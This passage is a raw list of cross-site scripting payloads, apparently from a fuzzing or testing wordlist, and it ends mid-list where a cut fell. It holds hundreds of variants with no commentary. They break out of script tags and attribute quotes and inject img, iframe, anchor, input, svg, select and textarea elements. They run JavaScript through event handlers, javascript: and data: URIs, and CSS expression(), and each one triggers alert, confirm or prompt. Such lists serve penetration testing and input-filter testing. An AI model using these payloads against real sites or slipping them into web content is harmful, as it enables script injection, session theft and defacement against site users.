"></script><img '//"%0Aonerror=confirm(1)// src=1>//
</script><img `//"%0Aonerror=confirm(1)// src=1>
</script><img //%0Aonerror=confirm(1)// src=1>
</script><img '//"%0Aonerror=prompt(1)// src=1>//
'</script><img '//"%0Aonerror=prompt(1)// src=1>//
'></script><img '//"%0Aonerror=prompt(1)// src=1>//
></script><img '//"%0Aonerror=prompt(1)// src=1>//
"</script><img '//"%0Aonerror=prompt(1)// src=1>//
"></script><img '//"%0Aonerror=prompt(1)// src=1>//
</script><img `//"%0Aonerror=prompt(1)// src=1>
</script><img //%0Aonerror=prompt(1)// src=1>
</script><img style="xss:expression(alert(1))">//
'</script><img style="xss:expression(alert(1))">//
'></script><img style="xss:expression(alert(1))">//
></script><img style="xss:expression(alert(1))">//
"</script><img style="xss:expression(alert(1))">//
"></script><img style="xss:expression(alert(1))">//
</script><img style="xss:expression(alert(1))">
</script><img style=xss:expression(alert(1))>
</script><img style="xss:expression(confirm(1))">//
'</script><img style="xss:expression(confirm(1))">//
'></script><img style="xss:expression(confirm(1))">//
></script><img style="xss:expression(confirm(1))">//
"</script><img style="xss:expression(confirm(1))">//
"></script><img style="xss:expression(confirm(1))">//
</script><img style="xss:expression(confirm(1))">
</script><img style=xss:expression(confirm(1))>
</script><img style="xss:expression(prompt(1))">//
'</script><img style="xss:expression(prompt(1))">//
'></script><img style="xss:expression(prompt(1))">//
></script><img style="xss:expression(prompt(1))">//
"</script><img style="xss:expression(prompt(1))">//
"></script><img style="xss:expression(prompt(1))">//
</script><img style="xss:expression(prompt(1))">
</script><img style=xss:expression(prompt(1))>
<iframe src=javascript:alert(1);height=0 width=0/><iframe>//
'<iframe src=javascript:alert(1);height=0 width=0/><iframe>//
'><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
"<iframe src=javascript:alert(1);height=0 width=0/><iframe>//
"><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
<iframe src=javascript:alert(1);height=0 width=0/><iframe>
<iframe src=javascript:alert(1);height=0 width=0/><iframe>
<iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
'<iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
'><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
"<iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
"><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
<iframe src=javascript:confirm(1);height=0 width=0/><iframe>
<iframe src=javascript:confirm(1);height=0 width=0/><iframe>
<iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
'<iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
'><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
"<iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
"><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
<iframe src=javascript:prompt(1);height=0 width=0/><iframe>
<iframe src=javascript:prompt(1);height=0 width=0/><iframe>
<iframe/onload=alert(1)>//
'<iframe/onload=alert(1)>//
'><iframe/onload=alert(1)>//
><iframe/onload=alert(1)>//
"<iframe/onload=alert(1)>//
"><iframe/onload=alert(1)>//
<iframe/onload=alert(1)>
<iframe/onload=alert(1)>
<iframe/onload=confirm(1)>//
'<iframe/onload=confirm(1)>//
'><iframe/onload=confirm(1)>//
><iframe/onload=confirm(1)>//
"<iframe/onload=confirm(1)>//
"><iframe/onload=confirm(1)>//
<iframe/onload=confirm(1)>
<iframe/onload=confirm(1)>
<iframe/onload=prompt(1)>//
'<iframe/onload=prompt(1)>//
'><iframe/onload=prompt(1)>//
><iframe/onload=prompt(1)>//
"<iframe/onload=prompt(1)>//
"><iframe/onload=prompt(1)>//
<iframe/onload=prompt(1)>
<iframe/onload=prompt(1)>
</script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
'</script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
'></script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
></script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
"</script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
"></script><iframe src=javascript:alert(1);height=0 width=0/><iframe>//
</script><iframe src=javascript:alert(1);height=0 width=0/><iframe>
</script><iframe src=javascript:alert(1);height=0 width=0/><iframe>
</script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
'</script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
'></script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
></script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
"</script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
"></script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>//
</script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>
</script><iframe src=javascript:confirm(1);height=0 width=0/><iframe>
</script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
'</script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
'></script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
></script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
"</script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
"></script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>//
</script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>
</script><iframe src=javascript:prompt(1);height=0 width=0/><iframe>
</script><iframe/onload=alert(1)>//
'</script><iframe/onload=alert(1)>//
'></script><iframe/onload=alert(1)>//
></script><iframe/onload=alert(1)>//
"</script><iframe/onload=alert(1)>//
"></script><iframe/onload=alert(1)>//
</script><iframe/onload=alert(1)>
</script><iframe/onload=alert(1)>
</script><iframe/onload=confirm(1)>//
'</script><iframe/onload=confirm(1)>//
'></script><iframe/onload=confirm(1)>//
></script><iframe/onload=confirm(1)>//
"</script><iframe/onload=confirm(1)>//
"></script><iframe/onload=confirm(1)>//
</script><iframe/onload=confirm(1)>
</script><iframe/onload=confirm(1)>
</script><iframe/onload=prompt(1)>//
'</script><iframe/onload=prompt(1)>//
'></script><iframe/onload=prompt(1)>//
></script><iframe/onload=prompt(1)>//
"</script><iframe/onload=prompt(1)>//
"></script><iframe/onload=prompt(1)>//
</script><iframe/onload=prompt(1)>
</script><iframe/onload=prompt(1)>
<a onmouseover="alert(1)">xxs link</a>//
'<a onmouseover="alert(1)">xxs link</a>//
'><a onmouseover="alert(1)">xxs link</a>//
><a onmouseover="alert(1)">xxs link</a>//
"<a onmouseover="alert(1)">xxs link</a>//
"><a onmouseover="alert(1)">xxs link</a>//
<a onmouseover="alert(1)">xxs link</a>
<a onmouseover=alert(1)>xxs link</a>
<a onmouseover="confirm(1)">xxs link</a>//
'<a onmouseover="confirm(1)">xxs link</a>//
'><a onmouseover="confirm(1)">xxs link</a>//
><a onmouseover="confirm(1)">xxs link</a>//
"<a onmouseover="confirm(1)">xxs link</a>//
"><a onmouseover="confirm(1)">xxs link</a>//
<a onmouseover="confirm(1)">xxs link</a>
<a onmouseover=confirm(1)>xxs link</a>
<a onmouseover="prompt(1)">xxs link</a>//
'<a onmouseover="prompt(1)">xxs link</a>//
'><a onmouseover="prompt(1)">xxs link</a>//
><a onmouseover="prompt(1)">xxs link</a>//
"<a onmouseover="prompt(1)">xxs link</a>//
"><a onmouseover="prompt(1)">xxs link</a>//
<a onmouseover="prompt(1)">xxs link</a>
<a onmouseover=prompt(1)>xxs link</a>
<a href="javascript:alert(1)">xss</a>//
'<a href="javascript:alert(1)">xss</a>//
'><a href="javascript:alert(1)">xss</a>//
><a href="javascript:alert(1)">xss</a>//
"<a href="javascript:alert(1)">xss</a>//
"><a href="javascript:alert(1)">xss</a>//
<a href="javascript:alert(1)">xss</a>
<a href=javascript:alert(1)>xss</a>
<a href="javascript:confirm(1)">xss</a>//
'<a href="javascript:confirm(1)">xss</a>//
'><a href="javascript:confirm(1)">xss</a>//
><a href="javascript:confirm(1)">xss</a>//
"<a href="javascript:confirm(1)">xss</a>//
"><a href="javascript:confirm(1)">xss</a>//
<a href="javascript:confirm(1)">xss</a>
<a href=javascript:confirm(1)>xss</a>
<a href="javascript:prompt(1)">xss</a>//
'<a href="javascript:prompt(1)">xss</a>//
'><a href="javascript:prompt(1)">xss</a>//
><a href="javascript:prompt(1)">xss</a>//
"<a href="javascript:prompt(1)">xss</a>//
"><a href="javascript:prompt(1)">xss</a>//
<a href="javascript:prompt(1)">xss</a>
<a href=javascript:prompt(1)>xss</a>
<a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
'<a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
'><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
"<a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
"><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
<a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>
<a href=data:text/html;blabla,<script>alert(1)</script>>Click Me</a>
<a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
'<a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
'><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
"<a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
"><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
<a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>
<a href=data:text/html;blabla,<script>confirm(1)</script>>Click Me</a>
<a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
'<a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
'><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
"<a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
"><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
<a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>
<a href=data:text/html;blabla,<script>prompt(1)</script>>Click Me</a>
</script><a onmouseover="alert(1)">xxs link</a>//
'</script><a onmouseover="alert(1)">xxs link</a>//
'></script><a onmouseover="alert(1)">xxs link</a>//
></script><a onmouseover="alert(1)">xxs link</a>//
"</script><a onmouseover="alert(1)">xxs link</a>//
"></script><a onmouseover="alert(1)">xxs link</a>//
</script><a onmouseover="alert(1)">xxs link</a>
</script><a onmouseover=alert(1)>xxs link</a>
</script><a onmouseover="confirm(1)">xxs link</a>//
'</script><a onmouseover="confirm(1)">xxs link</a>//
'></script><a onmouseover="confirm(1)">xxs link</a>//
></script><a onmouseover="confirm(1)">xxs link</a>//
"</script><a onmouseover="confirm(1)">xxs link</a>//
"></script><a onmouseover="confirm(1)">xxs link</a>//
</script><a onmouseover="confirm(1)">xxs link</a>
</script><a onmouseover=confirm(1)>xxs link</a>
</script><a onmouseover="prompt(1)">xxs link</a>//
'</script><a onmouseover="prompt(1)">xxs link</a>//
'></script><a onmouseover="prompt(1)">xxs link</a>//
></script><a onmouseover="prompt(1)">xxs link</a>//
"</script><a onmouseover="prompt(1)">xxs link</a>//
"></script><a onmouseover="prompt(1)">xxs link</a>//
</script><a onmouseover="prompt(1)">xxs link</a>
</script><a onmouseover=prompt(1)>xxs link</a>
</script><a href="javascript:alert(1)">xss</a>//
'</script><a href="javascript:alert(1)">xss</a>//
'></script><a href="javascript:alert(1)">xss</a>//
></script><a href="javascript:alert(1)">xss</a>//
"</script><a href="javascript:alert(1)">xss</a>//
"></script><a href="javascript:alert(1)">xss</a>//
</script><a href="javascript:alert(1)">xss</a>
</script><a href=javascript:alert(1)>xss</a>
</script><a href="javascript:confirm(1)">xss</a>//
'</script><a href="javascript:confirm(1)">xss</a>//
'></script><a href="javascript:confirm(1)">xss</a>//
></script><a href="javascript:confirm(1)">xss</a>//
"</script><a href="javascript:confirm(1)">xss</a>//
"></script><a href="javascript:confirm(1)">xss</a>//
</script><a href="javascript:confirm(1)">xss</a>
</script><a href=javascript:confirm(1)>xss</a>
</script><a href="javascript:prompt(1)">xss</a>//
'</script><a href="javascript:prompt(1)">xss</a>//
'></script><a href="javascript:prompt(1)">xss</a>//
></script><a href="javascript:prompt(1)">xss</a>//
"</script><a href="javascript:prompt(1)">xss</a>//
"></script><a href="javascript:prompt(1)">xss</a>//
</script><a href="javascript:prompt(1)">xss</a>
</script><a href=javascript:prompt(1)>xss</a>
</script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
'</script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
'></script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
></script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
"</script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
"></script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>//
</script><a href="data:text/html;blabla,<script>alert(1)</script>">Click Me</a>
</script><a href=data:text/html;blabla,<script>alert(1)</script>>Click Me</a>
</script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
'</script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
'></script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
></script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
"</script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
"></script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>//
</script><a href="data:text/html;blabla,<script>confirm(1)</script>">Click Me</a>
</script><a href=data:text/html;blabla,<script>confirm(1)</script>>Click Me</a>
</script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
'</script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
'></script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
></script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
"</script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
"></script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>//
</script><a href="data:text/html;blabla,<script>prompt(1)</script>">Click Me</a>
</script><a href=data:text/html;blabla,<script>prompt(1)</script>>Click Me</a>
<input onfocus=alert(1)>//
'<input onfocus=alert(1)>//
'><input onfocus=alert(1)>//
><input onfocus=alert(1)>//
"<input onfocus=alert(1)>//
"><input onfocus=alert(1)>//
<input onfocus=alert(1)>
<input onfocus=alert(1)>
<input onfocus=confirm(1)>//
'<input onfocus=confirm(1)>//
'><input onfocus=confirm(1)>//
><input onfocus=confirm(1)>//
"<input onfocus=confirm(1)>//
"><input onfocus=confirm(1)>//
<input onfocus=confirm(1)>
<input onfocus=confirm(1)>
<input onfocus=prompt(1)>//
'<input onfocus=prompt(1)>//
'><input onfocus=prompt(1)>//
><input onfocus=prompt(1)>//
"<input onfocus=prompt(1)>//
"><input onfocus=prompt(1)>//
<input onfocus=prompt(1)>
<input onfocus=prompt(1)>
<input onmouseover=alert(1)>//
'<input onmouseover=alert(1)>//
'><input onmouseover=alert(1)>//
><input onmouseover=alert(1)>//
"<input onmouseover=alert(1)>//
"><input onmouseover=alert(1)>//
<input onmouseover=alert(1)>
<input onmouseover=alert(1)>
<input onmouseover=confirm(1)>//
'<input onmouseover=confirm(1)>//
'><input onmouseover=confirm(1)>//
><input onmouseover=confirm(1)>//
"<input onmouseover=confirm(1)>//
"><input onmouseover=confirm(1)>//
<input onmouseover=confirm(1)>
<input onmouseover=confirm(1)>
<input onmouseover=prompt(1)>//
'<input onmouseover=prompt(1)>//
'><input onmouseover=prompt(1)>//
><input onmouseover=prompt(1)>//
"<input onmouseover=prompt(1)>//
"><input onmouseover=prompt(1)>//
<input onmouseover=prompt(1)>
<input onmouseover=prompt(1)>
<input onclick=alert(1)>//
'<input onclick=alert(1)>//
'><input onclick=alert(1)>//
><input onclick=alert(1)>//
"<input onclick=alert(1)>//
"><input onclick=alert(1)>//
<input onclick=alert(1)>
<input onclick=alert(1)>
<input onclick=confirm(1)>//
'<input onclick=confirm(1)>//
'><input onclick=confirm(1)>//
><input onclick=confirm(1)>//
"<input onclick=confirm(1)>//
"><input onclick=confirm(1)>//
<input onclick=confirm(1)>
<input onclick=confirm(1)>
<input onclick=prompt(1)>//
'<input onclick=prompt(1)>//
'><input onclick=prompt(1)>//
><input onclick=prompt(1)>//
"<input onclick=prompt(1)>//
"><input onclick=prompt(1)>//
<input onclick=prompt(1)>
<input onclick=prompt(1)>
</script><input onfocus=alert(1)>//
'</script><input onfocus=alert(1)>//
'></script><input onfocus=alert(1)>//
></script><input onfocus=alert(1)>//
"</script><input onfocus=alert(1)>//
"></script><input onfocus=alert(1)>//
</script><input onfocus=alert(1)>
</script><input onfocus=alert(1)>
</script><input onfocus=confirm(1)>//
'</script><input onfocus=confirm(1)>//
'></script><input onfocus=confirm(1)>//
></script><input onfocus=confirm(1)>//
"</script><input onfocus=confirm(1)>//
"></script><input onfocus=confirm(1)>//
</script><input onfocus=confirm(1)>
</script><input onfocus=confirm(1)>
</script><input onfocus=prompt(1)>//
'</script><input onfocus=prompt(1)>//
'></script><input onfocus=prompt(1)>//
></script><input onfocus=prompt(1)>//
"</script><input onfocus=prompt(1)>//
"></script><input onfocus=prompt(1)>//
</script><input onfocus=prompt(1)>
</script><input onfocus=prompt(1)>
</script><input onmouseover=alert(1)>//
'</script><input onmouseover=alert(1)>//
'></script><input onmouseover=alert(1)>//
></script><input onmouseover=alert(1)>//
"</script><input onmouseover=alert(1)>//
"></script><input onmouseover=alert(1)>//
</script><input onmouseover=alert(1)>
</script><input onmouseover=alert(1)>
</script><input onmouseover=confirm(1)>//
'</script><input onmouseover=confirm(1)>//
'></script><input onmouseover=confirm(1)>//
></script><input onmouseover=confirm(1)>//
"</script><input onmouseover=confirm(1)>//
"></script><input onmouseover=confirm(1)>//
</script><input onmouseover=confirm(1)>
</script><input onmouseover=confirm(1)>
</script><input onmouseover=prompt(1)>//
'</script><input onmouseover=prompt(1)>//
'></script><input onmouseover=prompt(1)>//
></script><input onmouseover=prompt(1)>//
"</script><input onmouseover=prompt(1)>//
"></script><input onmouseover=prompt(1)>//
</script><input onmouseover=prompt(1)>
</script><input onmouseover=prompt(1)>
</script><input onclick=alert(1)>//
'</script><input onclick=alert(1)>//
'></script><input onclick=alert(1)>//
></script><input onclick=alert(1)>//
"</script><input onclick=alert(1)>//
"></script><input onclick=alert(1)>//
</script><input onclick=alert(1)>
</script><input onclick=alert(1)>
</script><input onclick=confirm(1)>//
'</script><input onclick=confirm(1)>//
'></script><input onclick=confirm(1)>//
></script><input onclick=confirm(1)>//
"</script><input onclick=confirm(1)>//
"></script><input onclick=confirm(1)>//
</script><input onclick=confirm(1)>
</script><input onclick=confirm(1)>
</script><input onclick=prompt(1)>//
'</script><input onclick=prompt(1)>//
'></script><input onclick=prompt(1)>//
></script><input onclick=prompt(1)>//
"</script><input onclick=prompt(1)>//
"></script><input onclick=prompt(1)>//
</script><input onclick=prompt(1)>
</script><input onclick=prompt(1)>
<svg onload=alert(1)>//
'<svg onload=alert(1)>//
'><svg onload=alert(1)>//
><svg onload=alert(1)>//
"<svg onload=alert(1)>//
"><svg onload=alert(1)>//
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=confirm(1)>//
'<svg onload=confirm(1)>//
'><svg onload=confirm(1)>//
><svg onload=confirm(1)>//
"<svg onload=confirm(1)>//
"><svg onload=confirm(1)>//
<svg onload=confirm(1)>
<svg onload=confirm(1)>
<svg onload=prompt(1)>//
'<svg onload=prompt(1)>//
'><svg onload=prompt(1)>//
><svg onload=prompt(1)>//
"<svg onload=prompt(1)>//
"><svg onload=prompt(1)>//
<svg onload=prompt(1)>
<svg onload=prompt(1)>
</script><svg onload=alert(1)>//
'</script><svg onload=alert(1)>//
'></script><svg onload=alert(1)>//
></script><svg onload=alert(1)>//
"</script><svg onload=alert(1)>//
"></script><svg onload=alert(1)>//
</script><svg onload=alert(1)>
</script><svg onload=alert(1)>
</script><svg onload=confirm(1)>//
'</script><svg onload=confirm(1)>//
'></script><svg onload=confirm(1)>//
></script><svg onload=confirm(1)>//
"</script><svg onload=confirm(1)>//
"></script><svg onload=confirm(1)>//
</script><svg onload=confirm(1)>
</script><svg onload=confirm(1)>
</script><svg onload=prompt(1)>//
'</script><svg onload=prompt(1)>//
'></script><svg onload=prompt(1)>//
></script><svg onload=prompt(1)>//
"</script><svg onload=prompt(1)>//
"></script><svg onload=prompt(1)>//
</script><svg onload=prompt(1)>
</script><svg onload=prompt(1)>
<select onfocus=alert(1)>//
'<select onfocus=alert(1)>//
'><select onfocus=alert(1)>//
><select onfocus=alert(1)>//
"<select onfocus=alert(1)>//
"><select onfocus=alert(1)>//
<select onfocus=alert(1)>
<select onfocus=alert(1)>
<select onfocus=confirm(1)>//
'<select onfocus=confirm(1)>//
'><select onfocus=confirm(1)>//
><select onfocus=confirm(1)>//
"<select onfocus=confirm(1)>//
"><select onfocus=confirm(1)>//
<select onfocus=confirm(1)>
<select onfocus=confirm(1)>
<select onfocus=prompt(1)>//
'<select onfocus=prompt(1)>//
'><select onfocus=prompt(1)>//
><select onfocus=prompt(1)>//
"<select onfocus=prompt(1)>//
"><select onfocus=prompt(1)>//
<select onfocus=prompt(1)>
<select onfocus=prompt(1)>
<select onclick=alert(1)>//
'<select onclick=alert(1)>//
'><select onclick=alert(1)>//
><select onclick=alert(1)>//
"<select onclick=alert(1)>//
"><select onclick=alert(1)>//
<select onclick=alert(1)>
<select onclick=alert(1)>
<select onclick=confirm(1)>//
'<select onclick=confirm(1)>//
'><select onclick=confirm(1)>//
><select onclick=confirm(1)>//
"<select onclick=confirm(1)>//
"><select onclick=confirm(1)>//
<select onclick=confirm(1)>
<select onclick=confirm(1)>
<select onclick=prompt(1)>//
'<select onclick=prompt(1)>//
'><select onclick=prompt(1)>//
><select onclick=prompt(1)>//
"<select onclick=prompt(1)>//
"><select onclick=prompt(1)>//
<select onclick=prompt(1)>
<select onclick=prompt(1)>
<select onmouseover=alert(1)>//
'<select onmouseover=alert(1)>//
'><select onmouseover=alert(1)>//
><select onmouseover=alert(1)>//
"<select onmouseover=alert(1)>//
"><select onmouseover=alert(1)>//
<select onmouseover=alert(1)>
<select onmouseover=alert(1)>
<select onmouseover=confirm(1)>//
'<select onmouseover=confirm(1)>//
'><select onmouseover=confirm(1)>//
><select onmouseover=confirm(1)>//
"<select onmouseover=confirm(1)>//
"><select onmouseover=confirm(1)>//
<select onmouseover=confirm(1)>
<select onmouseover=confirm(1)>
<select onmouseover=prompt(1)>//
'<select onmouseover=prompt(1)>//
'><select onmouseover=prompt(1)>//
><select onmouseover=prompt(1)>//
"<select onmouseover=prompt(1)>//
"><select onmouseover=prompt(1)>//
<select onmouseover=prompt(1)>
<select onmouseover=prompt(1)>
</script><select onfocus=alert(1)>//
'</script><select onfocus=alert(1)>//
'></script><select onfocus=alert(1)>//
></script><select onfocus=alert(1)>//
"</script><select onfocus=alert(1)>//
"></script><select onfocus=alert(1)>//
</script><select onfocus=alert(1)>
</script><select onfocus=alert(1)>
</script><select onfocus=confirm(1)>//
'</script><select onfocus=confirm(1)>//
'></script><select onfocus=confirm(1)>//
></script><select onfocus=confirm(1)>//
"</script><select onfocus=confirm(1)>//
"></script><select onfocus=confirm(1)>//
</script><select onfocus=confirm(1)>
</script><select onfocus=confirm(1)>
</script><select onfocus=prompt(1)>//
'</script><select onfocus=prompt(1)>//
'></script><select onfocus=prompt(1)>//
></script><select onfocus=prompt(1)>//
"</script><select onfocus=prompt(1)>//
"></script><select onfocus=prompt(1)>//
</script><select onfocus=prompt(1)>
</script><select onfocus=prompt(1)>
</script><select onclick=alert(1)>//
'</script><select onclick=alert(1)>//
'></script><select onclick=alert(1)>//
></script><select onclick=alert(1)>//
"</script><select onclick=alert(1)>//
"></script><select onclick=alert(1)>//
</script><select onclick=alert(1)>
</script><select onclick=alert(1)>
</script><select onclick=confirm(1)>//
'</script><select onclick=confirm(1)>//
'></script><select onclick=confirm(1)>//
></script><select onclick=confirm(1)>//
"</script><select onclick=confirm(1)>//
"></script><select onclick=confirm(1)>//
</script><select onclick=confirm(1)>
</script><select onclick=confirm(1)>
</script><select onclick=prompt(1)>//
'</script><select onclick=prompt(1)>//
'></script><select onclick=prompt(1)>//
></script><select onclick=prompt(1)>//
"</script><select onclick=prompt(1)>//
"></script><select onclick=prompt(1)>//
</script><select onclick=prompt(1)>
</script><select onclick=prompt(1)>
</script><select onmouseover=alert(1)>//
'</script><select onmouseover=alert(1)>//
'></script><select onmouseover=alert(1)>//
></script><select onmouseover=alert(1)>//
"</script><select onmouseover=alert(1)>//
"></script><select onmouseover=alert(1)>//
</script><select onmouseover=alert(1)>
</script><select onmouseover=alert(1)>
</script><select onmouseover=confirm(1)>//
'</script><select onmouseover=confirm(1)>//
'></script><select onmouseover=confirm(1)>//
></script><select onmouseover=confirm(1)>//
"</script><select onmouseover=confirm(1)>//
"></script><select onmouseover=confirm(1)>//
</script><select onmouseover=confirm(1)>
</script><select onmouseover=confirm(1)>
</script><select onmouseover=prompt(1)>//
'</script><select onmouseover=prompt(1)>//
'></script><select onmouseover=prompt(1)>//
></script><select onmouseover=prompt(1)>//
"</script><select onmouseover=prompt(1)>//
"></script><select onmouseover=prompt(1)>//
</script><select onmouseover=prompt(1)>
</script><select onmouseover=prompt(1)>
<textarea onfocus=alert(1)>//
'<textarea onfocus=alert(1)>//
'><textarea onfocus=alert(1)>//
><textarea onfocus=alert(1)>//
"<textarea onfocus=alert(1)>//
"><textarea onfocus=alert(1)>//
<textarea onfocus=alert(1)>
<textarea onfocus=alert(1)>
<textarea onfocus=confirm(1)>//
'<textarea onfocus=confirm(1)>//
'><textarea onfocus=confirm(1)>//
><textarea onfocus=confirm(1)>//
"<textarea onfocus=confirm(1)>//
"><textarea onfocus=confirm(1)>//
<textarea onfocus=confirm(1)>
<textarea onfocus=confirm(1)>
<textarea onfocus=prompt(1)>//
'<textarea onfocus=prompt(1)>//
'><textarea onfocus=prompt(1)>//
><textarea onfocus=prompt(1)>//
"<textarea onfocus=prompt(1)>//
"><textarea onfocus=prompt(1)>//
<textarea onfocus=prompt(1)>
<textarea onfocus=prompt(1)>
<textarea onclick=alert(1)>//
'<textarea onclick=alert(1)>//
'><textarea onclick=alert(1)>//
><textarea onclick=alert(1)>//
"<textarea onclick=alert(1)>//
"><textarea onclick=alert(1)>//
<textarea onclick=alert(1)>
<textarea onclick=alert(1)>
<textarea onclick=confirm(1)>//
'<textarea onclick=confirm(1)>//
'><textarea onclick=confirm(1)>//
><textarea onclick=confirm(1)>//
"<textarea onclick=confirm(1)>//
"><textarea onclick=confirm(1)>//
<textarea onclick=confirm(1)>
<textarea onclick=confirm(1)>
<textarea onclick=prompt(1)>//
'<textarea onclick=prompt(1)>//
'><textarea onclick=prompt(1)>//
><textarea onclick=prompt(1)>//
"<textarea onclick=prompt(1)>//
"><textarea onclick=prompt(1)>//
<textarea onclick=prompt(1)>
<textarea onclick=prompt(1)>
<textarea onmouseover=alert(1)>//
'<textarea onmouseover=alert(1)>//
'><textarea onmouseover=alert(1)>//
><textarea onmouseover=alert(1)>//
"<textarea onmouseover=alert(1)>//
"><textarea onmouseover=alert(1)>//
<textarea onmouseover=alert(1)>
<textarea onmouseover=alert(1)>
<textarea onmouseover=confirm(1)>//
'<textarea onmouseover=confirm(1)>//
'><textarea onmouseover=confirm(1)>//
><textarea onmouseover=confirm(1)>//
"<textarea onmouseover=confirm(1)>//
"><textarea onmouseover=confirm(1)>//
<textarea onmouseover=confirm(1)>
<textarea onmouseover=confirm(1)>
<textarea onmouseover=prompt(1)>//
'<textarea onmouseover=prompt(1)>//
'><textarea onmouseover=prompt(1)>//
><textarea onmouseover=prompt(1)>//
"<textarea onmouseover=prompt(1)>//
"><textarea onmouseover=prompt(1)>//
<textarea onmouseover=prompt(1)>
<textarea onmouseover=prompt(1)>
</script><textarea onfocus=alert(1)>//
'</script><textarea onfocus=alert(1)>//
'></script><textarea onfocus=alert(1)>//
></script><textarea onfocus=alert(1)>//
"</script><textarea onfocus=alert(1)>//
"></script><textarea onfocus=alert(1)>//
</script><textarea onfocus=alert(1)>
</script><textarea onfocus=alert(1)>
</script><textarea onfocus=confirm(1)>//
'</script><textarea onfocus=confirm(1)>//
'></script><textarea onfocus=confirm(1)>//
></script><textarea onfocus=confirm(1)>//
"</script><textarea onfocus=confirm(1)>//
"></script><textarea onfocus=confirm(1)>//
</script><textarea onfocus=confirm(1)>
</script><textarea onfocus=confirm(1)>
</script><textarea onfocus=prompt(1)>//
'</script><textarea onfocus=prompt(1)>//
'></script><textarea onfocus=prompt(1)>//
></script><textarea onfocus=prompt(1)>//
"</script><textarea onfocus=prompt(1)>//
"></script><textarea onfocus=prompt(1)>//
</script><textarea onfocus=prompt(1)>
</script><textarea onfocus=prompt(1)>
</script><textarea onclick=alert(1)>//
'</script><textarea onclick=alert(1)>//
'></script><textarea onclick=alert(1)>//
></script><textarea onclick=alert(1)>//
"</script><textarea onclick=alert(1)>//
"></script><textarea onclick=alert(1)>//
</script><textarea onclick=alert(1)>
</script><textarea onclick=alert(1)>
</script><textarea onclick=confirm(1)>//
'</script><textarea onclick=confirm(1)>//
'></script><textarea onclick=confirm(1)>//
></script><textarea onclick=confirm(1)>//
"</script><textarea onclick=confirm(1)>//
"></script><textarea onclick=confirm(1)>//
</script><textarea onclick=confirm(1)>
</script><textarea onclick=confirm(1)>
</script><textarea onclick=prompt(1)>//
